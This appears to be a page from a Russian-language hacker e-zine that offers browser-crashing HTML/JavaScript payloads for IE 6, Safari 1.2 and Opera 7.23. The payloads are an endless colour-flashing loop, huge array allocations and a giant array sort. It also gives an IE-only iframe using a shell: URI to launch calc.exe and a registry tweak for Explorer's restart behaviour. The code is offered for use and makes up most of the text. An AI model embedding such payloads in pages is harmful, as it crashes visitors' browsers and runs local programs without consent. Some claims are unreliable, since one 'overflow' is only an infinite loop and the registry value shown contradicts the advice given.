+-----------------------------------------------------------------------------------------------------------------------------------------------[CP #1]----+
|
|
|
|
|
|
|
  _|_| _|_|         _|  _|     _|
_|     _|  _|     _|_|_|_|_| _|_|
_| ODE _|_|         _|  _|     _|
_|     _| UMP     _|_|_|_|_|   _|
    _|_| _|           _|  _|   _|_|_|
|
|
|
|
|
|
|
+-------------------------------------------------------------------------------------------------------------------------------------------------------------+
+---------------------------------------[1x08 Переполнение буфера в браузерах (/home/hack)]---------------------------------------+
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|

Интересненькие вещички всплывают (типа весна и все такое =).. Вот два переполнения буфера в браузерах (тестировалось на IE 6, Apple Safari 1.2 и Opera 7.23):

<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>

[Результат для 1 (test1.htm)]





<script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script>
<script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script>

[Результат для 2 (test2.htm)]





+ тока для IE:

<iframe src=shell:windows\\system32\\calc.exe></iframe>

В реестре существует ключ, от значения которого зависит будет ли перезапущен Explorer.exe. По умолчанию он включён. Рекомендуется его выставить в "0" ("AutoRestartShell"=dword:00000001 в ветви [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]).

[Результат для 3 (test3.htm)]

|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
+-----[content]-----------------------------------------------------------------------------------------------------------------------------(c)-CP--------+